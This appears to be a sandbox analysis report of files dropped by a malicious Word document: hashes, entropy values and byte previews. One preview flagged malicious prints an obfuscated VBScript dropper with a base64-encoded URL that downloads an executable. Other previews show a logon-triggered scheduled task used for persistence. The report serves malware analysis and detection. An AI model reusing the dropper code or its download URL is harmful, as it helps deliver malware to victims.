                    MD5:504BCEB76B1B1F81805B3CEF7AF2ADB9
                    SHA1:C27B1C1B74FE742D7CBCF761A77228DB521355CC
                    SHA-256:4F4592D04ECE34F52E4A726EC2F1305E403BF7F763658AFCF79ADC209DD3229D
                    SHA-512:F31F3225059F17A91E5200EA9777556609FC5929C00CEDA402AC56B68168F03042A4B5ABA9F18478F94A3D194E65ABCA53E8455D0DA956EE286EC2429E7B2F11
                    Malicious:false
                    Preview:c.0.5.=......... .P.a.c.k.a.g.e.E.M.B.E.D.W.o.r.d...D.o.c.u.m.e.n.t...8.........=....... .\.a. .W.o.r.d...D.o.c.u.m.e.n.t...8. .".%.T.M.P.%.\.\.D.Z.d.t.f.h.g.Y.g.e.g.h.D.{.....s.c.T.". .".e.w.:.{.0.0.0.0.0.0.0.0.-.0.0.0.0.-.0.0.0.0.-.0.0.0.0.-.0.0.0.0.0.0.0.0.0.0.0.0.}.".L.I.N.K.........................................................................................................................................................................................................................................................H...R...X............................................................................................................................................................................................................................................................................................................................................................................................CJ..OJ..QJ..^J..aJ.....j....CJ..OJ..QJ..U..^J..aJ.. .j...f...CJ..OJ..QJ..U..^J..aJ.
                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                    File Type:data
                    Category:dropped
                    Size (bytes):1024
                    Entropy (8bit):0.05390218305374581
                    Encrypted:false
                    SSDEEP:3:ol3lYdn:4Wn
                    MD5:5D4D94EE7E06BBB0AF9584119797B23A
                    SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                    SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                    SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                    Malicious:false
                    Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                    File Type:data
                    Category:dropped
                    Size (bytes):1536
                    Entropy (8bit):1.3586208805849453
                    Encrypted:false
                    SSDEEP:3:Iiiiiiiiiif3l/Hlnl/bl//l/bllBl/PvvvvvvvvvvFl/l/lAqsalHl3lldHzlba:IiiiiiiiiifdLloZQc8++lsJe1Mz9
                    MD5:6B81A62087B1275058CB5F290E114665
                    SHA1:BA97D7EC2644E7820E7617C33981B5FA31102E77
                    SHA-256:792572FCB0FDB7529A0B19092F03EA77C96E89B2DF16A08BCEDDDEA6DEEFE2AC
                    SHA-512:EEBB0F889DD906DC2FA0458AD2B467045B7CD8724553265D77E85232F9F17A363C683FFB1D50133B153C8D8ACCD4B0F07A8228C950681C269E65C0A3367B8130
                    Malicious:false
                    Preview:..(...(...(...(...(...(...(...(...(...(...(...A.l.b.u.s...A........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................."...&...*.......:...>...............................................................................................................................................................................................................................................................................................................................................................................................................................................
                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                    File Type:data
                    Category:dropped
                    Size (bytes):14967
                    Entropy (8bit):5.2903052371566135
                    Encrypted:false
                    SSDEEP:384:tnO6zzakaBa9aRaOa2EqJpvaYQci7oOoLEEE6oEaE32vwnAn8rb8WbTy:VOwzakaBa9aRaOa2EgpvaPCOoYPW1+wI
                    MD5:8897D3DECD33AFBC963A1237D8243E51
                    SHA1:2647121672D52A64186778657026815EF6431B08
                    SHA-256:5856851814E97939F46FD211B8F48F64E1DC0EE6A6CF0EA37C9D890C97B2E513
                    SHA-512:DE62D246BCE7A60476AF59E466D7FFE51C4CC621B3D35B8B2E2E277C901E4F875D7175610DD74795C90281AE9FA96CB1289A5EC7196B7AEE1706C3F20224AB34
                    Malicious:true
                    Preview:..<scriptleT.. >..<script language = 'vbscript'>....fsdfdsfs = "aHR0UDovL2xvZ2luLjkyOTM4OS5hbmt1cmEudXMvQXdPZ1lpV0cvZXhwbG9yZXIuZXhl" '98t9t..yulkytjtrhtjrkdsarjky ="ZXhwbG9yZXIuZXhl" '98t9t....sdpfkdfhow = "..F0.........ECD7............B8......9C.9892....9B"..sdpfkdfhow = "..F0.........ECD7............B8......9C.9892....9B"....Function age64Procode(ByVal cvwtr5ycbve, ByVal trtsk484t378).. Dim xtexenc.. if trtsk484t378 Then xtexenc = "utf-16le" Else xtexenc = "utf" + "-8".. ' Use an aux. XML document with a Base64-encoded element... ' Assigning the encoded text to .Text makes the decoded byte array.. ' available via .nodeTypedValue, which we can pass to BytesToStr().. kvjusvsfdcsb = "bje".. cvbnm = "CreateO" + kvjusvsfdcsb + "ct".. soswjwslvc = "reate".. mosdoepfy9eqje = "Se".. vposaleusaogr = "(""Msx".. vposaleusaogr = vposaleusaogr + "ml2.".. vposaleusaogr =
                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                    File Type:ASCII text, with CRLF line terminators
                    Category:dropped
                    Size (bytes):26
                    Entropy (8bit):3.95006375643621
                    Encrypted:false
                    SSDEEP:3:gAWY3n:qY3n
                    MD5:FBCCF14D504B7B2DBCB5A5BDA75BD93B
                    SHA1:D59FC84CDD5217C6CF74785703655F78DA6B582B
                    SHA-256:EACD09517CE90D34BA562171D15AC40D302F0E691B439F91BE1B6406E25F5913
                    SHA-512:AA1D2B1EA3C9DE3CCADB319D4E3E3276A2F27DD1A5244FE72DE2B6F94083DDDC762480482C5C2E53F803CD9E3973DDEFC68966F974E124307B5043E654443B98
                    Malicious:false
                    Preview:[ZoneTransfer]..ZoneId=3..
                    Process:C:\Users\user\AppData\Roaming\explorer.exe
                    File Type:XML 1.0 document, ASCII text
                    Category:dropped
                    Size (bytes):1576
                    Entropy (8bit):5.106338392454611
                    Encrypted:false
                    SSDEEP:24:2di4+S2qhZ1ty1mCUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtEIxvn:cgeZQYrFdOFzOzN33ODOiDdKrsuTEov
                    MD5:0490F3A3332FFCEB090DAAA0B90A5B44
                    SHA1:BCE6A4967E641B4A375CEE835D68D8DDD2702616
                    SHA-256:4346980FD7752A0B0374BE54812F21EE8D166DB258922926EC50EA99085390C3
                    SHA-512:3A987832EA3B135E6C1DFBACB4C35E603AE0F92B5F75784380E0D05E9EE356110DB74F3B7654EE92C52B679537EB8A3220E39F9E1F9E4C006DDDEEA5238BF5AA
                    Malicious:false
                    Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail
                    Process:C:\Users\user\AppData\Roaming\explorer.exe
                    File Type:XML 1.0 document, ASCII text
                    Category:dropped
                    Size (bytes):1576
                    Entropy (8bit):5.106338392454611
                    Encrypted:false
                    SSDEEP:24:2di4+S2qhZ1ty1mCUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtEIxvn:cgeZQYrFdOFzOzN33ODOiDdKrsuTEov
                    MD5:0490F3A3332FFCEB090DAAA0B90A5B44
                    SHA1:BCE6A4967E641B4A375CEE835D68D8DDD2702616
                    SHA-256:4346980FD7752A0B0374BE54812F21EE8D166DB258922926EC50EA99085390C3
                    SHA-512:3A987832EA3B135E6C1DFBACB4C35E603AE0F92B5F75784380E0D05E9EE356110DB74F3B7654EE92C52B679537EB8A3220E39F9E1F9E4C006DDDEEA5238BF5AA
                    Malicious:true
                    Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail
                    Process:C:\Users\user\AppData\Roaming\explorer.exe
                    File Type:XML 1.0 document, ASCII text
                    Category:dropped
                    Size (bytes):1576
                    Entropy (8bit):5.106338392454611
                    Encrypted:false
                    SSDEEP:24:2di4+S2qhZ1ty1mCUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtEIxvn:cgeZQYrFdOFzOzN33ODOiDdKrsuTEov
                    MD5:0490F3A3332FFCEB090DAAA0B90A5B44
                    SHA1:BCE6A4967E641B4A375CEE835D68D8DDD2702616
                    SHA-256:4346980FD7752A0B0374BE54812F21EE8D166DB258922926EC50EA99085390C3
                    SHA-512:3A987832EA3B135E6C1DFBACB4C35E603AE0F92B5F75784380E0D05E9EE356110DB74F3B7654EE92C52B679537EB8A3220E39F9E1F9E4C006DDDEEA5238BF5AA
                    Malicious:false
                    Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail
                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Tue Mar 8 15:45:53 2022, mtime=Tue Mar 8 15:45:53 2022, atime=Fri Sep 23 14:13:10 2022, length=221545, window=hide
                    Category:dropped
                    Size (bytes):1249
                    Entropy (8bit):4.605411221812945
                    Encrypted:false
                    SSDEEP:24:8S/XThOMEf/xfPGpUc8f4urejVPLRGpUc8f4+Dv3qSncX7cY:8S/XT4VHxfPGmc8f4ur8dGmc8f41WKl
                    MD5:039B3BAE1AC43CFB4B7A55E0718CE3DE
                    SHA1:5AC7365C5347CB79104F8D8AFFA1D06C682E69C5
                    SHA-256:6050A6269F4F98C76500E88338B39A51ACA713B42DA3B9BB317FE91AC95CF462
                    SHA-512:FCEBDF39501F151E63AD1C362E1A0BBABAB589146264FAFBF01A855344966CDBC14D61C5DE38D24A66ED81ADBE0CED2464FA1F42CCCB9B99F536529832B94E97
                    Malicious:false
                    Preview:L..................F.... ........3.......3..,.j.^...ia......................-....P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1.....hT....user.8......QK.XhT..*...&=....U...............A.l.b.u.s.....z.1.....hT....Desktop.d......QK.XhT..*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2.ia..7U.y .ITEMSE~1.DOC.........hT..hT..*...r.....'...............I.t.e.m. .S.e.l.e.c.t.i.o.n. .-. .I.n.q.u.i.r.y. .0.0.5.4.3.6.3.A.Z.H. .-. .A.l.t.a.y.G.l.o.b.a.l. .T.r.a.d.i.n.g...d.o.c.......................-...8...[............?J......C:\Users\..#...................\\320946\Users.user\Desktop\Item Selection - Inquiry 0054363AZH - AltayGlobal Trading.doc.T.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.I.t.e.m. .S.e.l.e.c.t.i.o.n. .-. .I.n.q.u.i.r.y. .0.0.5.4.3.6.3.A.Z.H. .-. .A.l.t.a.y.G.l.o.b.a.l. .T.r.a.d.i.n.g...d.o.c.........:..,.LB.)...Ag...
                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                    File Type:ASCII text, with CRLF line terminators
                    Category:dropped
                    Size (bytes):165
                    Entropy (8bit):5.127513882806606
                    Encrypted:false
                    SSDEEP:3:bDuMJl0RGlKCEQRWTj/tyWiTJ11lmX11IMlKCEQRWTj/tyWiTJ11lv:bCZGlvwnSThElvwnSTh1
                    MD5:8745E4FCA864966DBC611F9B69DB56FF
                    SHA1:00042A24EF471653B234494113FD49D58F966DA0
                    SHA-256:AE311E511D5247016BD50D3ECB1B74EF5043E70F5FE80740B4873C2D1F9EC9BA
                    SHA-512:011C715456294F33A9E5550B1081E5CEBFD278359467BCDC983C42A279AE06770754EE8F8A4E7DB7AF59116FBF66C295874C22602CEE37C9E47A93447AE93C76
                    Malicious:false
                    Preview:[folders]..Templates.LNK=0..Item Selection - Inquiry 0054363AZH - AltayGlobal Trading.LNK=0..[doc]..Item Selection - Inquiry 0054363AZH - AltayGlobal Trading.LNK=0..
                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                    File Type:data
                    Category:dropped
                    Size (bytes):162
                    Entropy (8bit):2.503835550707525
                    Encrypted:false
                    SSDEEP:3:vrJlaCkWtVyaJybdJylp2bG/WWNJbilFGUld/ln:vdsCkWtz8Oz2q/rViXdH/l
                    MD5:7CFA404FD881AF8DF49EA584FE153C61
                    SHA1:32D9BF92626B77999E5E44780BF24130F3D23D66
                    SHA-256:248DB6BD8C5CD3542A5C0AE228D3ACD6D8A7FA0C0C62ABC3E178E57267F6CCD7
                    SHA-512:F7CEC1177D4FF3F84F6F2A2A702E96713322AA56C628B49F728CD608E880255DA3EF412DE15BB58DF66D65560C03E68BA2A0DD6FDFA533BC9E428B0637562AEA
                    Malicious:false
                    Preview:.user..................................................A.l.b.u.s.............p........1h..............2h.............@3h..............3h.....z.......p4h.....x...
                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                    File Type:Little-endian UTF-16 Unicode text, with no line terminators
                    Category:dropped
                    Size (bytes):2
                    Entropy (8bit):1.0
                    Encrypted:false
                    SSDEEP:3:Qn:Qn
                    MD5:F3B25701FE362EC84616A93A45CE9998
                    SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                    SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                    SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                    Malicious:false
                    Preview:..
                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):8016
                    Entropy (8bit):3.578048501856237
                    Encrypted:false
                    SSDEEP:96:chQCwMqAqvsqvJCwoUz8hQCwMqAqvsEHyqvJCwor2zbJYtHryuyr6ylUVajp:cW1oUz8WdHnor2zbGd+6Ajp
                    MD5:0F8AC75BD0077688ACCFEE9437697FA8
                    SHA1:08223348762A77176589DB294E05FF3C20C3218D
                    SHA-256:EBB34E5231A8FFD7BC715A58F2503AC1E5311FD713A147DE87F46F2224920226
                    SHA-512:4BD9EB889798189D6F66B8DFDAB329E46368D0AF211C0AA2655C98782B63B1581592502D2C667A62CE4C0A15B92A9752092BC36FFD6917B1C9DC0C7A0BAF1FC6
                    Malicious:false
                    Preview:...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1.....hT....Programs..f.......:..hT..*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):8016
                    Entropy (8bit):3.578048501856237
                    Encrypted:false
                    SSDEEP:96:chQCwMqAqvsqvJCwoUz8hQCwMqAqvsEHyqvJCwor2zbJYtHryuyr6ylUVajp:cW1oUz8WdHnor2zbGd+6Ajp
                    MD5:0F8AC75BD0077688ACCFEE9437697FA8
                    SHA1:08223348762A77176589DB294E05FF3C20C3218D
                    SHA-256:EBB34E5231A8FFD7BC715A58F2503AC1E5311FD713A147DE87F46F2224920226
                    SHA-512:4BD9EB889798189D6F66B8DFDAB329E46368D0AF211C0AA2655C98782B63B1581592502D2C667A62CE4C0A15B92A9752092BC36FFD6917B1C9DC0C7A0BAF1FC6
                    Malicious:false
                    Preview:...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1.....hT....Programs..f.......:..hT..*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):8016
                    Entropy (8bit):3.578048501856237
                    Encrypted:false
                    SSDEEP:96:chQCwMqAqvsqvJCwoUz8hQCwMqAqvsEHyqvJCwor2zbJYtHryuyr6ylUVajp:cW1oUz8WdHnor2zbGd+6Ajp
                    MD5:0F8AC75BD0077688ACCFEE9437697FA8
                    SHA1:08223348762A77176589DB294E05FF3C20C3218D
                    SHA-256:EBB34E5231A8FFD7BC715A58F2503AC1E5311FD713A147DE87F46F2224920226
                    SHA-512:4BD9EB889798189D6F66B8DFDAB329E46368D0AF211C0AA2655C98782B63B1581592502D2C667A62CE4C0A15B92A9752092BC36FFD6917B1C9DC0C7A0BAF1FC6
                    Malicious:false
                    Preview:...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1.....hT....Programs..f.......:..hT..*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):8016
                    Entropy (8bit):3.580975945365273
                    Encrypted:false
                    SSDEEP:96:chQCwMqAqvsqvJCwoUz8hQCwMqAqvsEHyqvJCwor2zgJKrXHr6H6ylUVajp:cW1oUz8WdHnor2zgwv6H6Ajp
                    MD5:E0773AA865B4F855FCAF7F3A6E7A84D9
                    SHA1:CD5131197E93BA193CBDBAA557F5059DF306EFF9
                    SHA-256:C844ED3F932800F43BE0BE58F914E997365E68D36A57B2782A1214814FED62A4
                    SHA-512:FD39BB310FE0677C3D467694A959FAC30638501A201971FEB3CFF36C54E093E375E299096EA2772B4A5F148F4FAF8E2C3A4F4A37A8C70EC00053055ABB4C3E63
                    Malicious:false
                    Preview:...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1.....hT....Programs..f.......:..hT..*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):8016
                    Entropy (8bit):3.580975945365273
                    Encrypted:false
                    SSDEEP:96:chQCwMqAqvsqvJCwoUz8hQCwMqAqvsEHyqvJCwor2zgJKrXHr6H6ylUVajp:cW1oUz8WdHnor2zgwv6H6Ajp
                    MD5:E0773AA865B4F855FCAF7F3A6E7A84D9
                    SHA1:CD5131197E93BA193CBDBAA557F5059DF306EFF9
                    SHA-256:C844ED3F932800F43BE0BE58F914E997365E68D36A57B2782A1214814FED62A4
                    SHA-512:FD39BB310FE0677C3D467694A959FAC30638501A201971FEB3CFF36C54E093E375E299096EA2772B4A5F148F4FAF8E2C3A4F4A37A8C70EC00053055ABB4C3E63
                    Malicious:false
                    Preview:...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1.....hT....Programs..f.......:..hT..*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):8016
                    Entropy (8bit):3.578048501856237
                    Encrypted:false
                    SSDEEP:96:chQCwMqAqvsqvJCwoUz8hQCwMqAqvsEHyqvJCwor2zbJYtHryuyr6ylUVajp:cW1oUz8WdHnor2zbGd+6Ajp
                    MD5:0F8AC75BD0077688ACCFEE9437697FA8
                    SHA1:08223348762A77176589DB294E05FF3C20C3218D
                    SHA-256:EBB34E5231A8FFD7BC715A58F2503AC1E5311FD713A147DE87F46F2224920226
                    SHA-512:4BD9EB889798189D6F66B8DFDAB329E46368D0AF211C0AA2655C98782B63B1581592502D2C667A62CE4C0A15B92A9752092BC36FFD6917B1C9DC0C7A0BAF1FC6
                    Malicious:false
                    Preview:...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1.....hT....Programs..f.......:..hT..*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):8016
                    Entropy (8bit):3.578048501856237
                    Encrypted:false
                    SSDEEP:96:chQCwMqAqvsqvJCwoUz8hQCwMqAqvsEHyqvJCwor2zbJYtHryuyr6ylUVajp:cW1oUz8WdHnor2zbGd+6Ajp
                    MD5:0F8AC75BD0077688ACCFEE9437697FA8
                    SHA1:08223348762A77176589DB294E05FF3C20C3218D
                    SHA-256:EBB34E5231A8FFD7BC715A58F2503AC1E5311FD713A147DE87F46F2224920226
                    SHA-512:4BD9EB889798189D6F66B8DFDAB329E46368D0AF211C0AA2655C98782B63B1581592502D2C667A62CE4C0A15B92A9752092BC36FFD6917B1C9DC0C7A0BAF1FC6
                    Malicious:false
                    Preview:...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1.....hT....Programs..f.......:..hT..*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):8016
                    Entropy (8bit):3.580975945365273
                    Encrypted:false
